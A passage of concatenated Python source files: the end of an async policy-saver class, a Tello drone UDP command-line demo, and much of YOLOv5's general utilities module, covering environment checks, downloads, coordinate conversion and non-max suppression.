self._save_condition_variable.wait()
if saving_checkpoint:
self._policy_saver.save_checkpoint(export_dir)
else:
self._policy_saver.save(export_dir)
return
if not self._save_condition_variable.acquire(blocking=False):
logging.info("AsyncPolicySaver save is still in progress skipping save.")
return
try:
self._saving_checkpoint = saving_checkpoint
self._export_dir = export_dir
self._save_condition_variable.notify()
finally:
self._save_condition_variable.release()
def flush(self):
"""Blocks until there is no saving happening."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
def close(self):
"""Blocks until there is no saving happening and kills the save_thread."""
with self._save_condition_variable:
while self._export_dir:
logging.info("Waiting for AsyncPolicySaver to finish.")
self._save_condition_variable.wait()
self._join_save_thread = True
self._save_condition_variable.notify()
self._save_thread.join()
|
Tello3.py
|
#
# Tello Python3 Control Demo
#
# http://www.ryzerobotics.com/
#
# 1/1/2018
import threading
import socket
import sys
import time
from datetime import datetime
host = ''
port = 9000
locaddr = (host,port)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
tello_address = ('192.168.10.1', 8889)
sock.bind(locaddr)
def recv():
count = 0
while True:
try:
data, server = sock.recvfrom(1518)
print(data.decode(encoding="utf-8"))
except Exception:
print ('\n', datetime.now(), ' - Exit . . .\n')
break
print ('\r\n\r\n', datetime.now(), ' - Tello Python3 Demo.\r\n')
print (datetime.now(), ' - Tello: command takeoff land flip forward back left right \r\n up down cw ccw speed speed?\r\n')
print (datetime.now(), '- end -- quit demo.\r\n')
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
dateTimeObj = datetime.now()
while True:
try:
msg = input("");
if not msg:
break
if 'end' in msg:
print (datetime.now(), ' - ...')
sock.close()
break
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
print(datetime.now(), " - command sent to Tello: ", msg)
except KeyboardInterrupt:
print ('\n', datetime.now(), ' - . . .\n')
sock.close()
break
|
general.py
|
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
General utils
"""
import contextlib
import glob
import inspect
import logging
import math
import os
import platform
import random
import re
import shutil
import signal
import threading
import time
import urllib
from datetime import datetime
from itertools import repeat
from multiprocessing.pool import ThreadPool
from pathlib import Path
from subprocess import check_output
from typing import Optional
from zipfile import ZipFile
import cv2
import numpy as np
import pandas as pd
import pkg_resources as pkg
import torch
import torchvision
import yaml
from utils.downloads import gsutil_getsize
from utils.metrics import box_iou, fitness
FILE = Path(__file__).resolve()
ROOT = FILE.parents[1] # YOLOv5 root directory
RANK = int(os.getenv('RANK', -1))
# Settings
DATASETS_DIR = ROOT.parent / 'datasets' # YOLOv5 datasets directory
NUM_THREADS = min(8, max(1, os.cpu_count() - 1)) # number of YOLOv5 multiprocessing threads
AUTOINSTALL = str(os.getenv('YOLOv5_AUTOINSTALL', True)).lower() == 'true' # global auto-install mode
VERBOSE = str(os.getenv('YOLOv5_VERBOSE', True)).lower() == 'true' # global verbose mode
FONT = 'Arial.ttf' # https://ultralytics.com/assets/Arial.ttf
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
pd.options.display.max_columns = 10
cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
os.environ['NUMEXPR_MAX_THREADS'] = str(NUM_THREADS) # NumExpr max threads
os.environ['OMP_NUM_THREADS'] = str(NUM_THREADS) # OpenMP max threads (PyTorch and SciPy)
def is_kaggle():
# Is environment a Kaggle Notebook?
try:
assert os.environ.get('PWD') == '/kaggle/working'
assert os.environ.get('KAGGLE_URL_BASE') == 'https://www.kaggle.com'
return True
except AssertionError:
return False
def is_writeable(dir, test=False):
# Return True if directory has write permissions, test opening a file with write permissions if test=True
if not test:
return os.access(dir, os.R_OK) # possible issues on Windows
file = Path(dir) / 'tmp.txt'
try:
with open(file, 'w'): # open file with write permissions
pass
file.unlink() # remove file
return True
except OSError:
return False
def set_logging(name=None, verbose=VERBOSE):
# Sets level and returns logger
if is_kaggle():
for h in logging.root.handlers:
logging.root.removeHandler(h) # remove all handlers associated with the root logger object
rank = int(os.getenv('RANK', -1)) # rank in world for Multi-GPU trainings
level = logging.INFO if verbose and rank in {-1, 0} else logging.WARNING
log = logging.getLogger(name)
log.setLevel(level)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter("%(message)s"))
handler.setLevel(level)
log.addHandler(handler)
set_logging() # run before defining LOGGER
LOGGER = logging.getLogger("yolov5") # define globally (used in train.py, val.py, detect.py, etc.)
def user_config_dir(dir='Ultralytics', env_var='YOLOV5_CONFIG_DIR'):
# Return path of user configuration directory. Prefer environment variable if exists. Make dir if required.
env = os.getenv(env_var)
if env:
path = Path(env) # use environment variable
else:
cfg = {'Windows': 'AppData/Roaming', 'Linux': '.config', 'Darwin': 'Library/Application Support'} # 3 OS dirs
path = Path.home() / cfg.get(platform.system(), '') # OS-specific config dir
path = (path if is_writeable(path) else Path('/tmp')) / dir # GCP and AWS lambda fix, only /tmp is writeable
path.mkdir(exist_ok=True) # make if required
return path
CONFIG_DIR = user_config_dir() # Ultralytics settings dir
class Profile(contextlib.ContextDecorator):
# Usage: @Profile() decorator or 'with Profile():' context manager
def __enter__(self):
self.start = time.time()
def __exit__(self, type, value, traceback):
print(f'Profile results: {time.time() - self.start:.5f}s')
class Timeout(contextlib.ContextDecorator):
# Usage: @Timeout(seconds) decorator or 'with Timeout(seconds):' context manager
def __init__(self, seconds, *, timeout_msg='', suppress_timeout_errors=True):
self.seconds = int(seconds)
self.timeout_message = timeout_msg
self.suppress = bool(suppress_timeout_errors)
def _timeout_handler(self, signum, frame):
raise TimeoutError(self.timeout_message)
def __enter__(self):
if platform.system() != 'Windows': # not supported on Windows
signal.signal(signal.SIGALRM, self._timeout_handler) # Set handler for SIGALRM
signal.alarm(self.seconds) # start countdown for SIGALRM to be raised
def __exit__(self, exc_type, exc_val, exc_tb):
if platform.system() != 'Windows':
signal.alarm(0) # Cancel SIGALRM if it's scheduled
if self.suppress and exc_type is TimeoutError: # Suppress TimeoutError
return True
class WorkingDirectory(contextlib.ContextDecorator):
# Usage: @WorkingDirectory(dir) decorator or 'with WorkingDirectory(dir):' context manager
def __init__(self, new_dir):
self.dir = new_dir # new dir
self.cwd = Path.cwd().resolve() # current dir
def __enter__(self):
os.chdir(self.dir)
def __exit__(self, exc_type, exc_val, exc_tb):
os.chdir(self.cwd)
def try_except(func):
# try-except function. Usage: @try_except decorator
def handler(*args, **kwargs):
try:
func(*args, **kwargs)
except Exception as e:
print(e)
return handler
def threaded(func):
# Multi-threads a target function and returns thread. Usage: @threaded decorator
def wrapper(*args, **kwargs):
thread = threading.Thread(target=func, args=args, kwargs=kwargs, daemon=True)
thread.start()
return thread
return wrapper
def methods(instance):
# Get class/instance methods
return [f for f in dir(instance) if callable(getattr(instance, f)) and not f.startswith("__")]
def print_args(args: Optional[dict] = None, show_file=True, show_fcn=False):
# Print function arguments (optional args dict)
x = inspect.currentframe().f_back # previous frame
file, _, fcn, _, _ = inspect.getframeinfo(x)
if args is None: # get args automatically
args, _, _, frm = inspect.getargvalues(x)
args = {k: v for k, v in frm.items() if k in args}
s = (f'{Path(file).stem}: ' if show_file else '') + (f'{fcn}: ' if show_fcn else '')
LOGGER.info(colorstr(s) + ', '.join(f'{k}={v}' for k, v in args.items()))
def init_seeds(seed=0):
# Initialize random number generator (RNG) seeds https://pytorch.org/docs/stable/notes/randomness.html
# cudnn seed 0 settings are slower and more reproducible, else faster and less reproducible
import torch.backends.cudnn as cudnn
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
cudnn.benchmark, cudnn.deterministic = (False, True) if seed == 0 else (True, False)
def intersect_dicts(da, db, exclude=()):
# Dictionary intersection of matching keys and shapes, omitting 'exclude' keys, using da values
return {k: v for k, v in da.items() if k in db and not any(x in k for x in exclude) and v.shape == db[k].shape}
def get_latest_run(search_dir='.'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def is_docker():
# Is environment a Docker container?
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def is_colab():
# Is environment a Google Colab instance?
try:
import google.colab
return True
except ImportError:
return False
def is_pip():
# Is file in a pip package?
return 'site-packages' in Path(__file__).resolve().parts
def is_ascii(s=''):
# Is string composed of all ASCII (no UTF) characters? (note str().isascii() introduced in python 3.7)
s = str(s) # convert list, tuple, None, etc. to str
return len(s.encode().decode('ascii', 'ignore')) == len(s)
def is_chinese(s='人工智能'):
# Is string composed of any Chinese characters?
return bool(re.search('[\u4e00-\u9fff]', str(s)))
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def file_age(path=__file__):
# Return days since last file update
dt = (datetime.now() - datetime.fromtimestamp(Path(path).stat().st_mtime)) # delta
return dt.days # + dt.seconds / 86400 # fractional days
def file_date(path=__file__):
# Return human-readable file modification date, i.e. '2021-3-26'
t = datetime.fromtimestamp(Path(path).stat().st_mtime)
return f'{t.year}-{t.month}-{t.day}'
def file_size(path):
# Return file/dir size (MB)
mb = 1 << 20 # bytes to MiB (1024 ** 2)
path = Path(path)
if path.is_file():
return path.stat().st_size / mb
elif path.is_dir():
return sum(f.stat().st_size for f in path.glob('**/*') if f.is_file()) / mb
else:
return 0.0
def check_online():
# Check internet connectivity
import socket
try:
socket.create_connection(("1.1.1.1", 443), 5) # check host accessibility
return True
except OSError:
return False
def git_describe(path=ROOT): # path must be a directory
# Return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe
try:
assert (Path(path) / '.git').is_dir()
return check_output(f'git -C {path} describe --tags --long --always', shell=True).decode()[:-1]
except Exception:
return ''
@try_except
@WorkingDirectory(ROOT)
def check_git_status():
# Recommend 'git pull' if code is out of date
msg = ', for updates see https://github.com/ultralytics/yolov5'
s = colorstr('github: ') # string
assert Path('.git').exists(), s + 'skipping check (not a git repository)' + msg
assert not is_docker(), s + 'skipping check (Docker image)' + msg
assert check_online(), s + 'skipping check (offline)' + msg
cmd = 'git fetch && git config --get remote.origin.url'
url = check_output(cmd, shell=True, timeout=5).decode().strip().rstrip('.git') # git fetch
branch = check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out
n = int(check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind
if n > 0:
s += f"⚠️ YOLOv5 is out of date by {n} commit{'s' * (n > 1)}. Use `git pull` or `git clone {url}` to update."
else:
s += f'up to date with {url} ✅'
LOGGER.info(emojis(s)) # emoji-safe
def check_python(minimum='3.7.0'):
# Check current python version vs. required python version
check_version(platform.python_version(), minimum, name='Python ', hard=True)
def check_version(current='0.0.0', minimum='0.0.0', name='version ', pinned=False, hard=False, verbose=False):
# Check version vs. required version
current, minimum = (pkg.parse_version(x) for x in (current, minimum))
result = (current == minimum) if pinned else (current >= minimum) # bool
s = f'{name}{minimum} required by YOLOv5, but {name}{current} is currently installed' # string
if hard:
assert result, s # assert min requirements met
if verbose and not result:
LOGGER.warning(s)
return result
@try_except
def check_requirements(requirements=ROOT / 'requirements.txt', exclude=(), install=True, cmds=()):
# Check installed dependencies meet requirements (pass *.txt file or list of packages)
prefix = colorstr('red', 'bold', 'requirements:')
check_python() # check python version
if isinstance(requirements, (str, Path)): # requirements.txt file
file = Path(requirements)
assert file.exists(), f"{prefix} {file.resolve()} not found, check failed."
with file.open() as f:
requirements = [f'{x.name}{x.specifier}' for x in pkg.parse_requirements(f) if x.name not in exclude]
else: # list or tuple of packages
requirements = [x for x in requirements if x not in exclude]
n = 0 # number of packages updates
for i, r in enumerate(requirements):
try:
pkg.require(r)
except Exception: # DistributionNotFound or VersionConflict if requirements not met
s = f"{prefix} {r} not found and is required by YOLOv5"
if install and AUTOINSTALL: # check environment variable
LOGGER.info(f"{s}, attempting auto-update...")
try:
assert check_online(), f"'pip install {r}' skipped (offline)"
LOGGER.info(check_output(f'pip install "{r}" {cmds[i] if cmds else ""}', shell=True).decode())
n += 1
except Exception as e:
LOGGER.warning(f'{prefix} {e}')
else:
LOGGER.info(f'{s}. Please install and rerun your command.')
if n: # if packages updated
source = file.resolve() if 'file' in locals() else requirements
s = f"{prefix} {n} package{'s' * (n > 1)} updated per {source}\n" \
f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
LOGGER.info(emojis(s))
def check_img_size(imgsz, s=32, floor=0):
# Verify image size is a multiple of stride s in each dimension
if isinstance(imgsz, int): # integer i.e. img_size=640
new_size = max(make_divisible(imgsz, int(s)), floor)
else: # list i.e. img_size=[640, 480]
imgsz = list(imgsz) # convert to list if tuple
new_size = [max(make_divisible(x, int(s)), floor) for x in imgsz]
if new_size != imgsz:
LOGGER.warning(f'WARNING: --img-size {imgsz} must be multiple of max stride {s}, updating to {new_size}')
return new_size
def check_imshow():
# Check if environment supports image displays
try:
assert not is_docker(), 'cv2.imshow() is disabled in Docker environments'
assert not is_colab(), 'cv2.imshow() is disabled in Google Colab environments'
cv2.imshow('test', np.zeros((1, 1, 3)))
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return True
except Exception as e:
LOGGER.warning(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}')
return False
def check_suffix(file='yolov5s.pt', suffix=('.pt',), msg=''):
# Check file(s) for acceptable suffix
if file and suffix:
if isinstance(suffix, str):
suffix = [suffix]
for f in file if isinstance(file, (list, tuple)) else [file]:
s = Path(f).suffix.lower() # file suffix
if len(s):
assert s in suffix, f"{msg}{f} acceptable suffix is {suffix}"
def check_yaml(file, suffix=('.yaml', '.yml')):
# Search/download YAML file (if necessary) and return path, checking suffix
return check_file(file, suffix)
def check_file(file, suffix=''):
# Search/download file (if necessary) and return path
check_suffix(file, suffix) # optional
file = str(file) # convert to str()
if Path(file).is_file() or not file: # exists
return file
elif file.startswith(('http:/', 'https:/')): # download
url = file # warning: Pathlib turns :// -> :/
file = Path(urllib.parse.unquote(file).split('?')[0]).name # '%2F' to '/', split https://url.com/file.txt?auth
if Path(file).is_file():
LOGGER.info(f'Found {url} locally at {file}') # file already exists
else:
LOGGER.info(f'Downloading {url} to {file}...')
torch.hub.download_url_to_file(url, file)
assert Path(file).exists() and Path(file).stat().st_size > 0, f'File download failed: {url}' # check
return file
else: # search
files = []
for d in 'data', 'models', 'utils': # search directories
files.extend(glob.glob(str(ROOT / d / '**' / file), recursive=True)) # find file
assert len(files), f'File not found: {file}' # assert file was found
assert len(files) == 1, f"Multiple files match '{file}', specify exact path: {files}" # assert unique
return files[0] # return file
def check_font(font=FONT, progress=False):
# Download font to CONFIG_DIR if necessary
font = Path(font)
file = CONFIG_DIR / font.name
if not font.exists() and not file.exists():
url = "https://ultralytics.com/assets/" + font.name
LOGGER.info(f'Downloading {url} to {file}...')
torch.hub.download_url_to_file(url, str(file), progress=progress)
def check_dataset(data, autodownload=True):
# Download and/or unzip dataset if not found locally
# Usage: https://github.com/ultralytics/yolov5/releases/download/v1.0/coco128_with_yaml.zip
# Download (optional)
extract_dir = ''
if isinstance(data, (str, Path)) and str(data).endswith('.zip'): # i.e. gs://bucket/dir/coco128.zip
download(data, dir=DATASETS_DIR, unzip=True, delete=False, curl=False, threads=1)
data = next((DATASETS_DIR / Path(data).stem).rglob('*.yaml'))
extract_dir, autodownload = data.parent, False
# Read yaml (optional)
if isinstance(data, (str, Path)):
with open(data, errors='ignore') as f:
data = yaml.safe_load(f) # dictionary
# Resolve paths
path = Path(extract_dir or data.get('path') or '') # optional 'path' default to '.'
if not path.is_absolute():
path = (ROOT / path).resolve()
for k in 'train', 'val', 'test':
if data.get(k): # prepend path
data[k] = str(path / data[k]) if isinstance(data[k], str) else [str(path / x) for x in data[k]]
# Parse yaml
assert 'nc' in data, "Dataset 'nc' key missing."
if 'names' not in data:
data['names'] = [f'class{i}' for i in range(data['nc'])] # assign class names if missing
train, val, test, s = (data.get(x) for x in ('train', 'val', 'test', 'download'))
if val:
val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path
if not all(x.exists() for x in val):
LOGGER.info(emojis('\nDataset not found ⚠, missing paths %s' % [str(x) for x in val if not x.exists()]))
if not s or not autodownload:
raise Exception(emojis('Dataset not found ❌'))
t = time.time()
root = path.parent if 'path' in data else '..' # unzip directory i.e. '../'
if s.startswith('http') and s.endswith('.zip'): # URL
f = Path(s).name # filename
LOGGER.info(f'Downloading {s} to {f}...')
torch.hub.download_url_to_file(s, f)
Path(root).mkdir(parents=True, exist_ok=True) # create root
ZipFile(f).extractall(path=root) # unzip
Path(f).unlink() # remove zip
r = None # success
elif s.startswith('bash '): # bash script
LOGGER.info(f'Running {s} ...')
r = os.system(s)
else: # python script
r = exec(s, {'yaml': data}) # return None
dt = f'({round(time.time() - t, 1)}s)'
s = f"success ✅ {dt}, saved to {colorstr('bold', root)}" if r in (0, None) else f"failure {dt} ❌"
LOGGER.info(emojis(f"Dataset download {s}"))
check_font('Arial.ttf' if is_ascii(data['names']) else 'Arial.Unicode.ttf', progress=True) # download fonts
return data # dictionary
def check_amp(model):
# Check PyTorch Automatic Mixed Precision (AMP) functionality. Return True on correct operation
from models.common import AutoShape, DetectMultiBackend
def amp_allclose(model, im):
# All close FP32 vs AMP results
m = AutoShape(model, verbose=False) # model
a = m(im).xywhn[0] # FP32 inference
m.amp = True
b = m(im).xywhn[0] # AMP inference
return a.shape == b.shape and torch.allclose(a, b, atol=0.1) # close to 10% absolute tolerance
prefix = colorstr('AMP: ')
device = next(model.parameters()).device # get model device
if device.type == 'cpu':
return False # AMP disabled on CPU
f = ROOT / 'data' / 'images' / 'bus.jpg' # image to check
im = f if f.exists() else 'https://ultralytics.com/images/bus.jpg' if check_online() else np.ones((640, 640, 3))
try:
assert amp_allclose(model, im) or amp_allclose(DetectMultiBackend('yolov5n.pt', device), im)
LOGGER.info(emojis(f'{prefix}checks passed ✅'))
return True
except Exception:
help_url = 'https://github.com/ultralytics/yolov5/issues/7908'
LOGGER.warning(emojis(f'{prefix}checks failed ❌, disabling Automatic Mixed Precision. See {help_url}'))
return False
def url2file(url):
# Convert URL to filename, i.e. https://url.com/file.txt?auth -> file.txt
url = str(Path(url)).replace(':/', '://') # Pathlib turns :// -> :/
return Path(urllib.parse.unquote(url)).name.split('?')[0] # '%2F' to '/', split https://url.com/file.txt?auth
def download(url, dir='.', unzip=True, delete=True, curl=False, threads=1, retry=3):
# Multi-threaded file download and unzip function, used in data.yaml for autodownload
def download_one(url, dir):
# Download 1 file
success = True
f = dir / Path(url).name # filename
if Path(url).is_file(): # exists in current path
Path(url).rename(f) # move to dir
elif not f.exists():
LOGGER.info(f'Downloading {url} to {f}...')
for i in range(retry + 1):
if curl:
s = 'sS' if threads > 1 else '' # silent
r = os.system(f'curl -{s}L "{url}" -o "{f}" --retry 9 -C -') # curl download with retry, continue
success = r == 0
else:
torch.hub.download_url_to_file(url, f, progress=threads == 1) # torch download
success = f.is_file()
if success:
break
elif i < retry:
LOGGER.warning(f'Download failure, retrying {i + 1}/{retry} {url}...')
else:
LOGGER.warning(f'Failed to download {url}...')
if unzip and success and f.suffix in ('.zip', '.gz'):
LOGGER.info(f'Unzipping {f}...')
if f.suffix == '.zip':
ZipFile(f).extractall(path=dir) # unzip
elif f.suffix == '.gz':
os.system(f'tar xfz {f} --directory {f.parent}') # unzip
if delete:
f.unlink() # remove zip
dir = Path(dir)
dir.mkdir(parents=True, exist_ok=True) # make directory
if threads > 1:
pool = ThreadPool(threads)
pool.imap(lambda x: download_one(*x), zip(url, repeat(dir))) # multi-threaded
pool.close()
pool.join()
else:
for u in [url] if isinstance(url, (str, Path)) else url:
download_one(u, dir)
def make_divisible(x, divisor):
# Returns nearest x divisible by divisor
if isinstance(divisor, torch.Tensor):
divisor = int(divisor.max()) # to int
return math.ceil(x / divisor) * divisor
def clean_str(s):
# Cleans a string by replacing special characters with underscore _
return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s)
def one_cycle(y1=0.0, y2=1.0, steps=100):
# lambda function for sinusoidal ramp from y1 to y2 https://arxiv.org/pdf/1812.01187.pdf
return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1
def colorstr(*input):
# Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world')
*args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string
colors = {
'black': '\033[30m', # basic colors
'red': '\033[31m',
'green': '\033[32m',
'yellow': '\033[33m',
'blue': '\033[34m',
'magenta': '\033[35m',
'cyan': '\033[36m',
'white': '\033[37m',
'bright_black': '\033[90m', # bright colors
'bright_red': '\033[91m',
'bright_green': '\033[92m',
'bright_yellow': '\033[93m',
'bright_blue': '\033[94m',
'bright_magenta': '\033[95m',
'bright_cyan': '\033[96m',
'bright_white': '\033[97m',
'end': '\033[0m', # misc
'bold': '\033[1m',
'underline': '\033[4m'}
return ''.join(colors[x] for x in args) + f'{string}' + colors['end']
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
classes = labels[:, 0].astype(np.int) # labels = [class xywh]
weights = np.bincount(classes, minlength=nc) # occurrences per class
# Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class_weights and image contents
# Usage: index = random.choices(range(n), weights=image_weights, k=1) # weighted image sample
class_counts = np.array([np.bincount(x[:, 0].astype(np.int), minlength=nc) for x in labels])
return (class_weights.reshape(1, nc) * class_counts).sum(1)
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
return [
1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
# Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x
y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y
y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x
y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y
return y
def xyxy2xywhn(x, w=640, h=640, clip=False, eps=0.0):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] normalized where xy1=top-left, xy2=bottom-right
if clip:
clip_coords(x, (h - eps, w - eps)) # warning: inplace clip
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = ((x[:, 0] + x[:, 2]) / 2) / w # x center
y[:, 1] = ((x[:, 1] + x[:, 3]) / 2) / h # y center
y[:, 2] = (x[:, 2] - x[:, 0]) / w # width
y[:, 3] = (x[:, 3] - x[:, 1]) / h # height
return y
def xyn2xy(x, w=640, h=640, padw=0, padh=0):
# Convert normalized segments into pixel segments, shape (n,2)
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * x[:, 0] + padw # top left x
y[:, 1] = h * x[:, 1] + padh # top left y
return y
def segment2box(segment, width=640, height=640):
# Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy)
x, y = segment.T # segment xy
inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height)
x, y, = x[inside], y[inside]
return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # xyxy
def segments2boxes(segments):
# Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh)
boxes = []
for s in segments:
x, y = s.T # segment xy
boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy
return xyxy2xywh(np.array(boxes)) # cls, xywh
def resample_segments(segments, n=1000):
# Up-sample an (n,2) segment
for i, s in enumerate(segments):
x = np.linspace(0, len(s) - 1, n)
xp = np.arange(len(s))
segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy
return segments
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, shape):
# Clip bounding xyxy bounding boxes to image shape (height, width)
if isinstance(boxes, torch.Tensor): # faster individually
boxes[:, 0].clamp_(0, shape[1]) # x1
boxes[:, 1].clamp_(0, shape[0]) # y1
boxes[:, 2].clamp_(0, shape[1]) # x2
boxes[:, 3].clamp_(0, shape[0]) # y2
else: # np.array (faster grouped)
boxes[:, [0, 2]] = boxes[:, [0, 2]].clip(0, shape[1]) # x1, x2
boxes[:, [1, 3]] = boxes[:, [1, 3]].clip(0, shape[0]) # y1, y2
def non_max_suppression(prediction,
conf_thres=0.25,
iou_thres=0.45,
classes=None,
agnostic=False,
multi_label=False,
labels=(),
max_det=300):
"""Non-Maximum Suppression (NMS) on inference results to reject overlapping bounding boxes
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
bs = prediction.shape[0] # batch size
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Checks
assert 0 <= conf_thres <= 1, f'Invalid Confidence threshold {conf_thres}, valid values are between 0.0 and 1.0'
assert 0 <= iou_thres <= 1, f'Invalid IoU {iou_thres}, valid values are between 0.0 and 1.0'
# Settings
# min_wh = 2 # (pixels) minimum box width and height
max_wh = 7680 # (pixels) maximum box width and height
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 0.3 + 0.03 * bs # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)] * bs
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
lb = labels[xi]
v = torch.zeros((len(lb), nc + 5), device=x.device)
v[:, :4] = lb[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(lb)), lb[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
